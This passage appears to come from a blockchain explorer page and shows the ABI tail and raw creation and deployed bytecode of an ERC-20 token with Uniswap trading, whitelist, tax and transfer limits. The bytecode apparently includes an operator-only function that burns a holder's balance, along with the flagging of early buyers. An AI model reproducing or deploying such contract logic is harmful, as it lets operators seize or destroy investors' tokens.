nipas","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"swapThreshold","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"uniswapV2Pair","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"uniswapV2Router","outputs":[{"internalType":"contract IUniswapV2Router02","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"token","type":"address"}],"name":"withdrawTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"wl","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"stateMutability":"payable","type":"receive"}]

600680546001600160a01b031916739e11fafecece9256c095a4c349f42293ddc5a41a17905560e0604052600d60a09081526c2120a12c9029a0a322a6a7a7a760991b60c052600890620000549082620005ff565b5060408051808201909152600c81526b2120a12ca9a0a322a6a7a7a760a11b6020820152600990620000879082620005ff565b50600a80546001600160a01b03191661dead1790556103e8620000b86b033b2e3c9fd0803ce8000000601e620006e1565b620000c4919062000701565b600e556103e8620000e36b033b2e3c9fd0803ce8000000601e620006e1565b620000ef919062000701565b600f556127106200010e6b033b2e3c9fd0803ce80000006005620006e1565b6200011a919062000701565b6010556011805463ffffff0019169055600160138190556014556000601555678ac7230489e80000601655601780546001600160a01b03191673f1897c24a6a17885bdaede5b510b5b9faa80e5e41790553480156200017857600080fd5b5060088054620001889062000571565b80601f0160208091040260200160405190810160405280929190818152602001828054620001b69062000571565b8015620002075780601f10620001db5761010080835404028352916020019162000207565b820191906000526020600020905b815481529060010190602001808311620001e957829003601f168201915b5050505050600980546200021b9062000571565b80601f0160208091040260200160405190810160405280929190818152602001828054620002499062000571565b80156200029a5780601f106200026e576101008083540402835291602001916200029a565b820191906000526020600020905b8154815290600101906020018083116200027c57829003601f168201915b50505050508160039081620002b09190620005ff565b506004620002bf8282620005ff565b505050620002dc620002d66200043a60201b60201c565b6200043e565b620002f4336b033b2e3c9fd0803ce800000062000490565b60118054600360ff1991821617909155737a250d5630b4cf539739df2c5dacb4c659f2488d6080526005546001600160a01b039081166000908152600c6020908152604080832080548616600190811790915560068054861685528285208054881683179055601780548716865283862080548916841790553080875284872080548a16851790557f0ec9aca9afadc09fc0bd96ec7d7d6cfbb5408a5bc5bcf87bc0656b65508e559a80548a1685179055600a80548916885285882080548b1686179055600b9096527fd1def2fe8304e5e69b6f2907349cddd4c272de4ef47368d65b87ae00d7f1014780548a168517905533875284872080548a1685179055915487168652838620805489168417905554861685528285208054881683179055845281842080548716821790559154909316825291902080549092161790556200073a565b3390565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6001600160a01b038216620004eb5760405162461bcd60e51b815260206004820152601f60248201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604482015260640160405180910390fd5b8060026000828254620004ff919062000724565b90915550506001600160a01b038216600081815260208181526040808320805486019055518481527fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a35050565b505050565b634e487b7160e01b600052604160045260246000fd5b600181811c908216806200058657607f821691505b602082108103620005a757634e487b7160e01b600052602260045260246000fd5b50919050565b601f8211156200055657600081815260208120601f850160051c81016020861015620005d65750805b601f850160051c820191505b81811015620005f757828155600101620005e2565b505050505050565b81516001600160401b038111156200061b576200061b6200055b565b62000633816200062c845462000571565b84620005ad565b602080601f8311600181146200066b5760008415620006525750858301515b600019600386901b1c1916600185901b178555620005f7565b600085815260208120601f198616915b828110156200069c578886015182559484019460019091019084016200067b565b5085821015620006bb5787850151600019600388901b60f8161c191681555b5050505050600190811b01905550565b634e487b7160e01b600052601160045260246000fd5b8082028115828204841417620006fb57620006fb620006cb565b92915050565b6000826200071f57634e487b7160e01b600052601260045260246000fd5b500490565b80820180821115620006fb57620006fb620006cb565b608051611f4862000787600039600081816102d901528181610845015281816108d6015281816109ed01528181610a160152818161196b01528181611a230152611ab80152611f486000f3fe6080604052600436106102085760003560e01c8063715018a611610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a0578063e5b37a65146105c0578063ef437ff5146105f0578063f2fde38b14610610578063fca675a81461063057600080fd5b8063a9059cbb14610534578063aa4bde2814610554578063b61b64fa1461056a578063badb1df11461058057600080fd5b80638c0b5e22116100e75780638c0b5e22146104b65780638da5cb5b146104cc57806395d89b41146104ea578063a014f37d146104ff578063a457c2d71461051457600080fd5b8063715018a614610447578063751039fc1461045c5780638a8c523c146104715780638baa82491461048657600080fd5b8063313ce5671161019b57806349bd5a5e1161016a57806349bd5a5e146103c857806349df728c146103e85780634a1316721461040a57806354b762a61461041257806370a082311461042757600080fd5b8063313ce5671461036057806333ee17931461037c57806339509351146103925780633eb5d9b2146103b257600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806323b872dd146103105780632fee9e7e1461033057600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600a54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b5061026760105481565b604051908152602001610248565b34801561028157600080fd5b5061028a610657565b6040516102489190611b2c565b3480156102a357600080fd5b506102b76102b2366004611b8f565b6106e9565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f000000000000000000000000000000000000000000000000000000000000000081565b34801561030757600080fd5b50600254610267565b34801561031c57600080fd5b506102b761032b366004611bbb565b610703565b34801561033c57600080fd5b506102b761034b366004611bfc565b600c6020526000908152604090205460ff1681565b34801561036c57600080fd5b5060405160128152602001610248565b34801561038857600080fd5b5061026760145481565b34801561039e57600080fd5b506102b76103ad366004611b8f565b610727565b3480156103be57600080fd5b5061026760135481565b3480156103d457600080fd5b50600754610234906001600160a01b031681565b3480156103f457600080fd5b50610408610403366004611bfc565b610749565b005b61040861083b565b34801561041e57600080fd5b506102b7610af5565b34801561043357600080fd5b50610267610442366004611bfc565b610b3c565b34801561045357600080fd5b50610408610b57565b34801561046857600080fd5b50610408610b6b565b34801561047d57600080fd5b50610408610b8a565b34801561049257600080fd5b506102b76104a1366004611bfc565b600d6020526000908152604090205460ff1681565b3480156104c257600080fd5b50610267600e5481565b3480156104d857600080fd5b506005546001600160a01b0316610234565b3480156104f657600080fd5b5061028a610c05565b34801561050b57600080fd5b506102b7610c14565b34801561052057600080fd5b506102b761052f366004611b8f565b610c3b565b34801561054057600080fd5b506102b761054f366004611b8f565b610cb6565b34801561056057600080fd5b50610267600f5481565b34801561057657600080fd5b5061026760125481565b34801561058c57600080fd5b5061040861059b366004611bfc565b610cc4565b3480156105ac57600080fd5b506102676105bb366004611c20565b610d10565b3480156105cc57600080fd5b506102b76105db366004611bfc565b600b6020526000908152604090205460ff1681565b3480156105fc57600080fd5b5061040861060b366004611c67565b610d3b565b34801561061c57600080fd5b5061040861062b366004611bfc565b610d6e565b34801561063c57600080fd5b5060115461064a9060ff1681565b6040516102489190611cab565b60606003805461066690611cd3565b80601f016020809104026020016040519081016040528092919081815260200182805461069290611cd3565b80156106df5780601f106106b4576101008083540402835291602001916106df565b820191906000526020600020905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b6000336106f7818585610de4565b60019150505b92915050565b600033610711858285610f08565b61071c858585610f82565b506001949350505050565b6000336106f781858561073a8383610d10565b6107449190611d23565b610de4565b6107516114f5565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c89190611d36565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610813573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108379190611d4f565b5050565b6108436114f5565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108a1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108c59190611d6c565b6001600160a01b031663c9c65396307f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610932573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109569190611d6c565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156109a3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109c79190611d6c565b600780546001600160a01b0319166001600160a01b0392909216919091179055610a14307f0000000000000000000000000000000000000000000000000000000000000000600019610de4565b7f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663f305d7193430610a4e30610b3c565b600080610a636005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610acb573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610af09190611d89565b505050565b6006546012546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b30573d6000803e3d6000fd5b50506000601255600190565b6001600160a01b031660009081526020819052604090205490565b610b5f6114f5565b610b69600061154f565b565b610b736114f5565b6b033b2e3c9fd0803ce8000000600e819055600f55565b610b926114f5565b60115462010000900460ff1615610bf05760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6011805463ffff000019166301010000179055565b60606004805461066690611cd3565b6000610c1e6114f5565b506011805460ff1916600317905560016013819055601481905590565b60003381610c498286610d10565b905083811015610ca95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610be7565b61071c8286868403610de4565b6000336106f7818585610f82565b610ccc6115a1565b6001600160a01b0381166000908152600c60205260409020805460ff19169055601654610d0d908290610cfe82610b3c565b610d089190611db7565b611610565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d436114f5565b6001600160a01b03919091166000908152600c60205260409020805460ff1916911515919091179055565b610d766114f5565b6001600160a01b038116610ddb5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610be7565b610d0d8161154f565b6001600160a01b038316610e465760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610be7565b6001600160a01b038216610ea75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610be7565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f148484610d10565b90506000198114610f7c5781811015610f6f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610be7565b610f7c8484848403610de4565b50505050565b6001600160a01b038316610fa85760405162461bcd60e51b8152600401610be790611dca565b6001600160a01b038216610fce5760405162461bcd60e51b8152600401610be790611e0f565b6001600160a01b0383166000908152600b602052604090205460ff1615801561101057506001600160a01b0382166000908152600b602052604090205460ff16155b156110635760115462010000900460ff166110635760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610be7565b6001600160a01b0383166000908152600c602052604090205460ff161580156110a557506001600160a01b0382166000908152600c602052604090205460ff16155b156111ba576007546001600160a01b038381169116146111ba57600e548111156111375760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610be7565b600f5461114383610b3c565b61114d9083611d23565b11156111ba5760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610be7565b6001600160a01b0383166000908152600b6020526040902054819060ff161580156111fe57506001600160a01b0383166000908152600b602052604090205460ff16155b156114ea576007546001600160a01b038581169116148061122c57506007546001600160a01b038481169116145b1561147357600e548211156112a95760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610be7565b6007546001600160a01b0385811691161480156112df57506001600160a01b0383166000908152600c602052604090205460ff16155b80156112f457506001600160a01b0384163014155b1561137257600060115460ff16600381111561131257611312611c95565b0361133b576001600160a01b0383166000908152600d60205260409020805460ff191660011790555b600060646013548461134d9190611e52565b6113579190611e69565b9050611364853083611742565b61136e8184611db7565b9150505b6007546001600160a01b0384811691161480156113a857506001600160a01b0384166000908152600c602052604090205460ff16155b80156113bd57506001600160a01b0383163014155b80156113d257506011546301000000900460ff165b80156113e65750601154610100900460ff16155b1561146e576014546001600160a01b0385166000908152600d602052604090205460ff16151560010361141857506015545b6011805461ff00191661010017905561142f61186c565b6011805461ff0019169055600060646114488386611e52565b6114529190611e69565b905061145f863083611742565b6114698185611db7565b925050505b6114ea565b6001600160a01b0384166000908152600d602052604090205460ff16151560011480156114ae57506007546001600160a01b03848116911614155b156114ea5760006064601554846114c59190611e52565b6114cf9190611e69565b90506114dc853083611742565b6114e68184611db7565b9150505b610f7c848483611742565b6005546001600160a01b03163314610b695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610be7565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610b695760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610be7565b6001600160a01b0382166116705760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610be7565b6001600160a01b038216600090815260208190526040902054818110156116e45760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610be7565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3505050565b6001600160a01b0383166117685760405162461bcd60e51b8152600401610be790611dca565b6001600160a01b03821661178e5760405162461bcd60e51b8152600401610be790611e0f565b6001600160a01b038316600090815260208190526040902054818110156118065760405162461bcd60e51b815260206004820152602660248201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604482015265616c616e636560d01b6064820152608401610be7565b6001600160a01b03848116600081815260208181526040808320878703905593871680835291849020805487019055925185815290927fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef910160405180910390a3610f7c565b61187530610b3c565b60000361187e57565b60008061188a30610b3c565b60065490915047906000906118a7906001600160a01b0316610b3c565b9050600060105484111561190d574792506118c3846000611914565b6118cd8347611db7565b94506010548211156118f557806118e55760006118e7565b845b6118f19086611e69565b6012555b84601260008282546119079190611d23565b90915550505b5050505050565b604080516002808252606082018352600092602083019080368337019050509050308160008151811061194957611949611e8b565b60200260200101906001600160a01b031690816001600160a01b0316815250507f00000000000000000000000000000000000000000000000000000000000000006001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa1580156119c7573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906119eb9190611d6c565b816001815181106119fe576119fe611e8b565b6001600160a01b03928316602091820292909201015260405163095ea7b360e01b81527f000000000000000000000000000000000000000000000000000000000000000090911660048201526000196024820152309063095ea7b3906044016020604051808303816000875af1158015611a7c573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190611aa09190611d4f565b5060405163791ac94760e01b81526001600160a01b037f0000000000000000000000000000000000000000000000000000000000000000169063791ac94790611af59086908690869030904290600401611ea1565b600060405180830381600087803b158015611b0f57600080fd5b505af1158015611b23573d6000803e3d6000fd5b50505050505050565b600060208083528351808285015260005b81811015611b5957858101830151858201604001528201611b3d565b506000604082860101526040601f19601f8301168501019250505092915050565b6001600160a01b0381168114610d0d57600080fd5b60008060408385031215611ba257600080fd5b8235611bad81611b7a565b946020939093013593505050565b600080600060608486031215611bd057600080fd5b8335611bdb81611b7a565b92506020840135611beb81611b7a565b929592945050506040919091013590565b600060208284031215611c0e57600080fd5b8135611c1981611b7a565b9392505050565b60008060408385031215611c3357600080fd5b8235611c3e81611b7a565b91506020830135611c4e81611b7a565b809150509250929050565b8015158114610d0d57600080fd5b60008060408385031215611c7a57600080fd5b8235611c8581611b7a565b91506020830135611c4e81611c59565b634e487b7160e01b600052602160045260246000fd5b6020810160048310611ccd57634e487b7160e01b600052602160045260246000fd5b91905290565b600181811c90821680611ce757607f821691505b602082108103611d0757634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fd5b808201808211156106fd576106fd611d0d565b600060208284031215611d4857600080fd5b5051919050565b600060208284031215611d6157600080fd5b8151611c1981611c59565b600060208284031215611d7e57600080fd5b8151611c1981611b7a565b600080600060608486031215611d9e57600080fd5b8351925060208401519150604084015190509250925092565b818103818111156106fd576106fd611d0d565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526023908201527f45524332303a207472616e7366657220746f20746865207a65726f206164647260408201526265737360e81b606082015260800190565b80820281158282048414176106fd576106fd611d0d565b600082611e8657634e487b7160e01b600052601260045260246000fd5b500490565b634e487b7160e01b600052603260045260246000fd5b600060a082018783526020878185015260a0604085015281875180845260c086019150828901935060005b81811015611ef15784516001600160a01b031683529383019391830191600101611ecc565b50506001600160a01b0396909616606085015250505060800152939250505056fea26469706673582212202391ce72f028a4cf6f0b3846c7e425e916fe0ebc045c5a9b78c845df8adba03764736f6c63430008120033

Deployed Bytecode

0x6080604052600436106102085760003560e01c8063715018a611610118578063a9059cbb116100a0578063dd62ed3e1161006f578063dd62ed3e146105a0578063e5b37a65146105c0578063ef437ff5146105f0578063f2fde38b14610610578063fca675a81461063057600080fd5b8063a9059cbb14610534578063aa4bde2814610554578063b61b64fa1461056a578063badb1df11461058057600080fd5b80638c0b5e22116100e75780638c0b5e22146104b65780638da5cb5b146104cc57806395d89b41146104ea578063a014f37d146104ff578063a457c2d71461051457600080fd5b8063715018a614610447578063751039fc1461045c5780638a8c523c146104715780638baa82491461048657600080fd5b8063313ce5671161019b57806349bd5a5e1161016a57806349bd5a5e146103c857806349df728c146103e85780634a1316721461040a57806354b762a61461041257806370a082311461042757600080fd5b8063313ce5671461036057806333ee17931461037c57806339509351146103925780633eb5d9b2146103b257600080fd5b80631694505e116101d75780631694505e146102c757806318160ddd146102fb57806323b872dd146103105780632fee9e7e1461033057600080fd5b806303fd2a45146102145780630445b6671461025157806306fdde0314610275578063095ea7b31461029757600080fd5b3661020f57005b600080fd5b34801561022057600080fd5b50600a54610234906001600160a01b031681565b6040516001600160a01b0390911681526020015b60405180910390f35b34801561025d57600080fd5b5061026760105481565b604051908152602001610248565b34801561028157600080fd5b5061028a610657565b6040516102489190611b2c565b3480156102a357600080fd5b506102b76102b2366004611b8f565b6106e9565b6040519015158152602001610248565b3480156102d357600080fd5b506102347f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d81565b34801561030757600080fd5b50600254610267565b34801561031c57600080fd5b506102b761032b366004611bbb565b610703565b34801561033c57600080fd5b506102b761034b366004611bfc565b600c6020526000908152604090205460ff1681565b34801561036c57600080fd5b5060405160128152602001610248565b34801561038857600080fd5b5061026760145481565b34801561039e57600080fd5b506102b76103ad366004611b8f565b610727565b3480156103be57600080fd5b5061026760135481565b3480156103d457600080fd5b50600754610234906001600160a01b031681565b3480156103f457600080fd5b50610408610403366004611bfc565b610749565b005b61040861083b565b34801561041e57600080fd5b506102b7610af5565b34801561043357600080fd5b50610267610442366004611bfc565b610b3c565b34801561045357600080fd5b50610408610b57565b34801561046857600080fd5b50610408610b6b565b34801561047d57600080fd5b50610408610b8a565b34801561049257600080fd5b506102b76104a1366004611bfc565b600d6020526000908152604090205460ff1681565b3480156104c257600080fd5b50610267600e5481565b3480156104d857600080fd5b506005546001600160a01b0316610234565b3480156104f657600080fd5b5061028a610c05565b34801561050b57600080fd5b506102b7610c14565b34801561052057600080fd5b506102b761052f366004611b8f565b610c3b565b34801561054057600080fd5b506102b761054f366004611b8f565b610cb6565b34801561056057600080fd5b50610267600f5481565b34801561057657600080fd5b5061026760125481565b34801561058c57600080fd5b5061040861059b366004611bfc565b610cc4565b3480156105ac57600080fd5b506102676105bb366004611c20565b610d10565b3480156105cc57600080fd5b506102b76105db366004611bfc565b600b6020526000908152604090205460ff1681565b3480156105fc57600080fd5b5061040861060b366004611c67565b610d3b565b34801561061c57600080fd5b5061040861062b366004611bfc565b610d6e565b34801561063c57600080fd5b5060115461064a9060ff1681565b6040516102489190611cab565b60606003805461066690611cd3565b80601f016020809104026020016040519081016040528092919081815260200182805461069290611cd3565b80156106df5780601f106106b4576101008083540402835291602001916106df565b820191906000526020600020905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b6000336106f7818585610de4565b60019150505b92915050565b600033610711858285610f08565b61071c858585610f82565b506001949350505050565b6000336106f781858561073a8383610d10565b6107449190611d23565b610de4565b6107516114f5565b6006546040516370a0823160e01b81523060048201526001600160a01b038381169263a9059cbb9291169083906370a0823190602401602060405180830381865afa1580156107a4573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906107c89190611d36565b6040516001600160e01b031960e085901b1681526001600160a01b03909216600483015260248201526044016020604051808303816000875af1158015610813573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108379190611d4f565b5050565b6108436114f5565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663c45a01556040518163ffffffff1660e01b8152600401602060405180830381865afa1580156108a1573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906108c59190611d6c565b6001600160a01b031663c9c65396307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663ad5c46486040518163ffffffff1660e01b8152600401602060405180830381865afa158015610932573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109569190611d6c565b6040516001600160e01b031960e085901b1681526001600160a01b039283166004820152911660248201526044016020604051808303816000875af11580156109a3573d6000803e3d6000fd5b505050506040513d601f19601f820116820180604052508101906109c79190611d6c565b600780546001600160a01b0319166001600160a01b0392909216919091179055610a14307f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d600019610de4565b7f0000000000000000000000007a250d5630b4cf539739df2c5dacb4c659f2488d6001600160a01b031663f305d7193430610a4e30610b3c565b600080610a636005546001600160a01b031690565b60405160e088901b6001600160e01b03191681526001600160a01b03958616600482015260248101949094526044840192909252606483015290911660848201524260a482015260c40160606040518083038185885af1158015610acb573d6000803e3d6000fd5b50505050506040513d601f19601f82011682018060405250810190610af09190611d89565b505050565b6006546012546040516000926001600160a01b03169180156108fc029184818181858888f19350505050158015610b30573d6000803e3d6000fd5b50506000601255600190565b6001600160a01b031660009081526020819052604090205490565b610b5f6114f5565b610b69600061154f565b565b610b736114f5565b6b033b2e3c9fd0803ce8000000600e819055600f55565b610b926114f5565b60115462010000900460ff1615610bf05760405162461bcd60e51b815260206004820152601a60248201527f54726164696e6720697320616c726561647920656e61626c656400000000000060448201526064015b60405180910390fd5b6011805463ffff000019166301010000179055565b60606004805461066690611cd3565b6000610c1e6114f5565b506011805460ff1916600317905560016013819055601481905590565b60003381610c498286610d10565b905083811015610ca95760405162461bcd60e51b815260206004820152602560248201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604482015264207a65726f60d81b6064820152608401610be7565b61071c8286868403610de4565b6000336106f7818585610f82565b610ccc6115a1565b6001600160a01b0381166000908152600c60205260409020805460ff19169055601654610d0d908290610cfe82610b3c565b610d089190611db7565b611610565b50565b6001600160a01b03918216600090815260016020908152604080832093909416825291909152205490565b610d436114f5565b6001600160a01b03919091166000908152600c60205260409020805460ff1916911515919091179055565b610d766114f5565b6001600160a01b038116610ddb5760405162461bcd60e51b815260206004820152602660248201527f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160448201526564647265737360d01b6064820152608401610be7565b610d0d8161154f565b6001600160a01b038316610e465760405162461bcd60e51b8152602060048201526024808201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646044820152637265737360e01b6064820152608401610be7565b6001600160a01b038216610ea75760405162461bcd60e51b815260206004820152602260248201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604482015261737360f01b6064820152608401610be7565b6001600160a01b0383811660008181526001602090815260408083209487168084529482529182902085905590518481527f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925910160405180910390a3505050565b6000610f148484610d10565b90506000198114610f7c5781811015610f6f5760405162461bcd60e51b815260206004820152601d60248201527f45524332303a20696e73756666696369656e7420616c6c6f77616e63650000006044820152606401610be7565b610f7c8484848403610de4565b50505050565b6001600160a01b038316610fa85760405162461bcd60e51b8152600401610be790611dca565b6001600160a01b038216610fce5760405162461bcd60e51b8152600401610be790611e0f565b6001600160a01b0383166000908152600b602052604090205460ff1615801561101057506001600160a01b0382166000908152600b602052604090205460ff16155b156110635760115462010000900460ff166110635760405162461bcd60e51b8152602060048201526013602482015272151c98591a5b99c81b9bdd08195b98589b1959606a1b6044820152606401610be7565b6001600160a01b0383166000908152600c602052604090205460ff161580156110a557506001600160a01b0382166000908152600c602052604090205460ff16155b156111ba576007546001600160a01b038381169116146111ba57600e548111156111375760405162461bcd60e51b815260206004820152603d60248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74206265660000006064820152608401610be7565b600f5461114383610b3c565b61114d9083611d23565b11156111ba5760405162461bcd60e51b815260206004820152603660248201527f45524332303a2062616c616e636520616d6f756e74206578636565646564206d604482015275185e081dd85b1b195d08185b5bdd5b9d081b1a5b5a5d60521b6064820152608401610be7565b6001600160a01b0383166000908152600b6020526040902054819060ff161580156111fe57506001600160a01b0383166000908152600b602052604090205460ff16155b156114ea576007546001600160a01b038581169116148061122c57506007546001600160a01b038481169116145b1561147357600e548211156112a95760405162461bcd60e51b815260206004820152603960248201527f45524332303a207472616e7366657220616d6f756e742065786365656473207460448201527f6865206d6178207472616e73616374696f6e20616d6f756e74000000000000006064820152608401610be7565b6007546001600160a01b0385811691161480156112df57506001600160a01b0383166000908152600c602052604090205460ff16155b80156112f457506001600160a01b0384163014155b1561137257600060115460ff16600381111561131257611312611c95565b0361133b576001600160a01b0383166000908152600d60205260409020805460ff191660011790555b600060646013548461134d9190611e52565b6113579190611e69565b9050611364853083611742565b61136e8184611db7565b9150505b6007546001600160a01b0384811691161480156113a857506001600160a01b0384166000908152600c602052604090205460ff16155b80156113bd57506001600160a01b0383163014155b80156113d257506011546301000000900460ff165b80156113e65750601154610100900460ff16155b1561146e576014546001600160a01b0385166000908152600d602052604090205460ff16151560010361141857506015545b6011805461ff00191661010017905561142f61186c565b6011805461ff0019169055600060646114488386611e52565b6114529190611e69565b905061145f863083611742565b6114698185611db7565b925050505b6114ea565b6001600160a01b0384166000908152600d602052604090205460ff16151560011480156114ae57506007546001600160a01b03848116911614155b156114ea5760006064601554846114c59190611e52565b6114cf9190611e69565b90506114dc853083611742565b6114e68184611db7565b9150505b610f7c848483611742565b6005546001600160a01b03163314610b695760405162461bcd60e51b815260206004820181905260248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e65726044820152606401610be7565b600580546001600160a01b038381166001600160a01b0319831681179093556040519116919082907f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e090600090a35050565b6006546001600160a01b0316336001600160a01b031614610b695760405162461bcd60e51b815260206004820152602360248201527f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f706572616044820152623a37b960e91b6064820152608401610be7565b6001600160a01b0382166116705760405162461bcd60e51b815260206004820152602160248201527f45524332303a206275726e2066726f6d20746865207a65726f206164647265736044820152607360f81b6064820152608401610be7565b6001600160a01b038216600090815260208190526040902054818110156116e45760405162461bcd60e51b815260206004820152602260248201527f45524332303a206275726e20616d6f756e7420657863656564732062616c616e604482015261636560f01b6064820152608401610be7565b6001600160a01b0383166000818152602081815260408083208686039055600280548790039055518581529192917fddf252ad1be2c89b69c2b068fc378daa952ba7f